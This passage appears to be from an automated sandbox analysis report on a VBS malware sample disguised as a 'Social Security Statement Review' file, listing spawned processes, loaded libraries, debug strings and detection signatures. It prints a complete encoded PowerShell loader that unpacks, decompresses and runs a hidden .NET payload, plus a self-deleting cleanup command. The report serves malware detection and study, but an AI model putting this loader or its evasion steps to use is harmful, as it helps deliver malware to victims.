0AYQBpAG4ALgBMAG8AYQBkACgAJABLAGkAaABqAGoAaQBkAG4AeQApADsAIAAkAFUAaABmAGwAdgAgAD0AIAAkAEwAdABnAHQAegB6AHEAYwB1AHYALgBFAG4AdAByAHkAUABvAGkAbgB0ADsAIABbAFMAeQBzAHQAZQBtAC4ARABlAGwAZQBnAGEAdABlAF0AOgA6AEMAcgBlAGEAdABlAEQAZQBsAGUAZwBhAHQAZQAoAFsAQQBjAHQAaQBvAG4AXQAsACAAJABVAGgAZgBsAHYALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAFUAaABmAGwAdgAuAE4AYQBtAGUAKQAuAEQAeQBuAGEAbQBpAGMASQBuAHYAbwBrAGUAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" Start-Sleep -Seconds 5; Remove-Item -Path 'C:\Users\user\Desktop\Social_Security_Statement_Review.vbs' -Force
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exe "C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exe" -enc JABWAGkAaAB3AHgAaQBrAHQAZwBuACAAPQAgAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ARgBpAGwAZQBOAGEAbQBlAC4AUgBlAHAAbABhAGMAZQAoACcALgBlAHgAZQAnACwAJwAnACkAOwAkAEgAZwB3AHIAYgBjAGkAegBoAGsAIAA9ACAAZwBlAHQALQBjAG8AbgB0AGUAbgB0ACAAJABWAGkAaAB3AHgAaQBrAHQAZwBuACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADsAIAAkAEsAaQBoAGoAagBpAGQAbgB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEgAZwB3AHIAYgBjAGkAegBoAGsALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAEMAbwB4AG0AYgB4AG4AZgB0AGgAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAEsAaQBoAGoAagBpAGQAbgB5ACAAKQA7ACQATwB2AGoAbQBhACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABIAHgAYgB6AGgAbQB5AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAgACQAQwBvAHgAbQBiAHgAbgBmAHQAaAAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQASAB4AGIAegBoAG0AeQB0AC4AQwBvAHAAeQBUAG8AKAAgACQATwB2AGoAbQBhACAAKQA7ACQASAB4AGIAegBoAG0AeQB0AC4AQwBsAG8AcwBlACgAKQA7ACQAQwBvAHgAbQBiAHgAbgBmAHQAaAAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAEsAaQBoAGoAagBpAGQAbgB5ACAAPQAgACQATwB2AGoAbQBhAC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABLAGkAaABqAGoAaQBkAG4AeQApADsAIAAkAEwAdABnAHQAegB6AHEAYwB1AHYAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABLAGkAaABqAGoAaQBkAG4AeQApADsAIAAkAFUAaABmAGwAdgAgAD0AIAAkAEwAdABnAHQAegB6AHEAYwB1AHYALgBFAG4AdAByAHkAUABvAGkAbgB0ADsAIABbAFMAeQBzAHQAZQBtAC4ARABlAGwAZQBnAGEAdABlAF0AOgA6AEMAcgBlAGEAdABlAEQAZQBsAGUAZwBhAHQAZQAoAFsAQQBjAHQAaQBvAG4AXQAsACAAJABVAGgAZgBsAHYALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAFUAaABmAGwAdgAuAE4AYQBtAGUAKQAuAEQAeQBuAGEAbQBpAGMASQBuAHYAbwBrAGUAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=Jump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" Start-Sleep -Seconds 5; Remove-Item -Path 'C:\Users\user\Desktop\Social_Security_Statement_Review.vbs' -ForceJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: twext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cscui.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: workfoldersshell.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: shacct.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: idstore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: samlib.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wlidprov.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: starttiledata.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: provsvc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: usermgrcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: usermgrproxy.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: acppage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: aepic.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeSection loaded: atl.dllJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Social_Security_Statement_Review.vbsStatic file information: File size 2289532 > 1048576
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2110263849.0000024F67A8F000.00000004.00000800.00020000.00000000.sdmp, Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2060632755.0000024F581EA000.00000004.00000800.00020000.00000000.sdmp, Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2157787430.0000024F6FC40000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2110263849.0000024F67A8F000.00000004.00000800.00020000.00000000.sdmp, Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2060632755.0000024F581EA000.00000004.00000800.00020000.00000000.sdmp, Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2157787430.0000024F6FC40000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: powershell.pdbUGP source: Social_Security_Statement_Review.vbs.exe, 00000004.00000000.1462493070.00007FF6C0E3A000.00000002.00000001.01000000.00000005.sdmp, Social_Security_Statement_Review.vbs.exe.2.dr
              Source: Binary string: protobuf-net.pdbSHA256}Lq source: Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2110263849.0000024F67A8F000.00000004.00000800.00020000.00000000.sdmp, Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2157071231.0000024F6FBF0000.00000004.08000000.00040000.00000000.sdmp, Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2110263849.0000024F67505000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdb source: Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2110263849.0000024F67A8F000.00000004.00000800.00020000.00000000.sdmp, Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2157071231.0000024F6FBF0000.00000004.08000000.00040000.00000000.sdmp, Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2110263849.0000024F67505000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: powershell.pdb source: Social_Security_Statement_Review.vbs.exe, 00000004.00000000.1462493070.00007FF6C0E3A000.00000002.00000001.01000000.00000005.sdmp, Social_Security_Statement_Review.vbs.exe.2.dr

              Data Obfuscation

              barindex
              .NET source code contains method to dynamically call methods (often used by packers)
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f68750e28.7.raw.unpack, oDmwayYLiGBjuEoNNmf.cs.Net Code: Type.GetTypeFromHandle(JSUJWCoJmGHX41eYXj5.c5ObWjJdjv(16777265)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(JSUJWCoJmGHX41eYXj5.c5ObWjJdjv(16777259)),Type.GetTypeFromHandle(JSUJWCoJmGHX41eYXj5.c5ObWjJdjv(16777263))})
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f6862cfe8.6.raw.unpack, oDmwayYLiGBjuEoNNmf.cs.Net Code: Type.GetTypeFromHandle(JSUJWCoJmGHX41eYXj5.c5ObWjJdjv(16777265)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(JSUJWCoJmGHX41eYXj5.c5ObWjJdjv(16777259)),Type.GetTypeFromHandle(JSUJWCoJmGHX41eYXj5.c5ObWjJdjv(16777263))})
              .NET source code contains potential unpacker
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f6fbf0000.13.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f6fbf0000.13.raw.unpack, ListDecorator.cs.Net Code: Read
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f6fbf0000.13.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f6fbf0000.13.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f6fbf0000.13.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
              Yara detected Costura Assembly Loader
              Source: Yara matchFile source: 4.2.Social_Security_Statement_Review.vbs.exe.24f6f580000.10.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.Social_Security_Statement_Review.vbs.exe.24f679770c0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.2145984908.0000024F6F580000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2060632755.0000024F57431000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2110263849.0000024F67505000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Social_Security_Statement_Review.vbs.exe PID: 1648, type: MEMORYSTR
              Source: Social_Security_Statement_Review.vbs.exe.2.drStatic PE information: 0x7EDA4115 [Wed Jun 10 07:45:25 2037 UTC]
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeCode function: 4_2_00007FF887BDAE50 pushad ; ret 4_2_00007FF887BDAE51
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeCode function: 4_2_00007FF887BD2A75 pushad ; iretd 4_2_00007FF887BD2A79
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeCode function: 4_2_00007FF887BD7967 push ebx; retf 4_2_00007FF887BD796A
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeCode function: 4_2_00007FF887F25EC4 push ebp; ret 4_2_00007FF887F261D8
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeCode function: 4_2_00007FF887F261B1 push ebp; ret 4_2_00007FF887F261D8
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeCode function: 4_2_00007FF887F24368 pushad ; iretd 4_2_00007FF887F24369
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeCode function: 4_2_00007FF887F3BD30 push FFFFFFFAh; retf 4_2_00007FF887F3BDA4
